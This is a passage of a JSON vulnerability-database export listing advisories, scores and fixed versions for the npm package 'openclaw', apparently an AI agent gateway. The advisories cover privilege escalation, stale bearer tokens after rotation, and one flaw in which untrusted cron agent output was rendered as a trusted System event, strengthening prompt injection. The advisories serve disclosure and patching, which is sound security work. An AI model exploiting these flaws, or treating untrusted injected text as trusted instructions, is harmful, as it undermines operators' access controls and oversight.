qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sh4x-nq7t-ykgg"},{"vulnerability":"VCID-sj4d-eenz-zqet"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-swjf-k83n-h7gf"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tkxh-m458-6ydw"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-w8sb-7ymy-wkez"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpnh-32hh-p7fb"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ycse-95bv-7ua9"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-z8sm-pm9t-wyhu"},{"vulnerability":"VCID-z9a2-t66z-buga"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.7"}],"aliases":["GHSA-rchv-x836-w7xp"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-2927-2whr-sudd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89951?format=json","vulnerability_id":"VCID-294z-6z8j-97bx","summary":"OpenClaw: Gateway operator.write Can Reach Admin-Class Telegram Config and Cron Persistence via send\n## Summary\nGateway operator.write Can Reach Admin-Class Telegram Config and Cron Persistence via send\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Real shipped operator.write to admin-class Telegram config or cron persistence bug, but it is an authenticated sink-specific escalation and high is too high given the narrower scope.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.24`\n- Patched versions: `>= 2026.3.28`\n- First stable tag containing the fix: `v2026.3.28`\n\n## Fix Commit(s)\n- `b7d70ade3b9900dbe97bd73be9c02e924ff3c986` — 2026-03-25T12:12:09-06:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.28`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @zpbrent for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41359","reference_id":"","reference_type":"","scores":[{"value":"0.0003","scoring_system":"epss","scoring_elements":"0.092","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0003","scoring_system":"epss","scoring_elements":"0.09219","published_at":"2026-06-06T12:55:00Z"},{"value":"0.0003","scoring_system":"epss","scoring_elements":"0.09201","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41359"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/b7d70ade3b9900dbe97bd73be9c02e924ff3c986","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:37:35Z/"}],"url":"https://github.com/openclaw/openclaw/commit/b7d70ade3b9900dbe97bd73be9c02e924ff3c986"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-767m-xrhc-fxm7","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:37:35Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-767m-xrhc-fxm7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41359","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41359"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-operator-write-to-admin-class-telegram-config-and-cron-persistence","reference_id":"","reference_type":"","scores":[{"value":"7.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"7.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-25T01:37:35Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-privilege-escalation-via-operator-write-to-admin-class-telegram-config-and-cron-persistence"},{"reference_url":"https://github.com/advisories/GHSA-767m-xrhc-fxm7","reference_id":"GHSA-767m-xrhc-fxm7","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-767m-xrhc-fxm7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41359","GHSA-767m-xrhc-fxm7"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-294z-6z8j-97bx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89628?format=json","vulnerability_id":"VCID-29a1-7ar7-67e1","summary":"OpenClaw: Gateway HTTP endpoints re-resolve bearer auth after SecretRef rotation\n## Summary\n\nGateway HTTP and WebSocket handlers captured the resolved bearer-auth configuration when the server started. After a SecretRef rotation, the already-running gateway could continue accepting the old bearer token until restart.\n\n## Impact\n\nA bearer token that should have been revoked by SecretRef rotation could remain valid on the gateway HTTP and upgrade surfaces for the lifetime of the process. Severity remains high because the old token could continue to authorize gateway requests after operators believed it was rotated out.\n\n## Affected versions\n\n- Affected: `< 2026.4.15`\n- Patched: `2026.4.15`\n\n## Fix\n\nOpenClaw `2026.4.15` resolves active gateway auth from the runtime secret snapshot per request and per upgrade instead of using a stale startup-time value.\n\nVerified in `v2026.4.15`:\n\n- `src/gateway/server.impl.ts` exposes `getResolvedAuth()` backed by the current runtime secret snapshot.\n- `src/gateway/server-http.ts` calls `getResolvedAuth()` for each HTTP request and WebSocket upgrade before running auth checks.\n- `src/gateway/server-http.probe.test.ts` verifies `/ready` re-resolves bearer auth after rotation and rejects the old token.\n\nFix commit included in `v2026.4.15` and absent from `v2026.4.14`:\n\n- `acd4e0a32f12e1ad85f3130f63b42443ce90f094` via PR #66651\n\nThanks to @zsxsoft, Keen Security Lab, and @qclawer for reporting this issue.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43585","reference_id":"","reference_type":"","scores":[{"value":"0.00131","scoring_system":"epss","scoring_elements":"0.32235","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00131","scoring_system":"epss","scoring_elements":"0.32265","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00143","scoring_system":"epss","scoring_elements":"0.34377","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-43585"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/acd4e0a32f12e1ad85f3130f63b42443ce90f094","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:53:26Z/"}],"url":"https://github.com/openclaw/openclaw/commit/acd4e0a32f12e1ad85f3130f63b42443ce90f094"},{"reference_url":"https://github.com/openclaw/openclaw/pull/66651","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/66651"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xmxx-7p24-h892","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:53:26Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-xmxx-7p24-h892"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43585","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-43585"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-bearer-token-validation-bypass-via-stale-secretref-resolution","reference_id":"","reference_type":"","scores":[{"value":"8.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-05-07T13:53:26Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-bearer-token-validation-bypass-via-stale-secretref-resolution"},{"reference_url":"https://github.com/advisories/GHSA-xmxx-7p24-h892","reference_id":"GHSA-xmxx-7p24-h892","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-xmxx-7p24-h892"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109881?format=json","purl":"pkg:npm/openclaw@2026.4.15","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2yd-uw91-9yck"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.15"}],"aliases":["CVE-2026-43585","GHSA-xmxx-7p24-h892"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-29a1-7ar7-67e1"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89187?format=json","vulnerability_id":"VCID-2c8p-gbaw-3ye4","summary":"OpenClaw: Isolated cron awareness events were recorded as trusted system events\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nOutput from webhook-triggered isolated cron agent runs could be queued into the main session awareness stream without `trusted: false`. That made the event render as a trusted `System:` event instead of an untrusted system event.\n\nThis is a trust-labeling issue that can strengthen prompt-injection impact, but it does not directly bypass gateway auth, tool policy, or sandboxing. Severity is low.\n\n## Fix\n\nOpenClaw now preserves untrusted labels for isolated cron awareness events and forwards the trust flag through cron delivery helpers.\n\nFix commit:\n\n- `f61896b03cc7031f51106a04566831f4ac2a0bd7`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44999","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04732","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04745","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04761","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44999"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"1.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U"},{"value":"LOW","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/f61896b03cc7031f51106a04566831f4ac2a0bd7","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"1.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA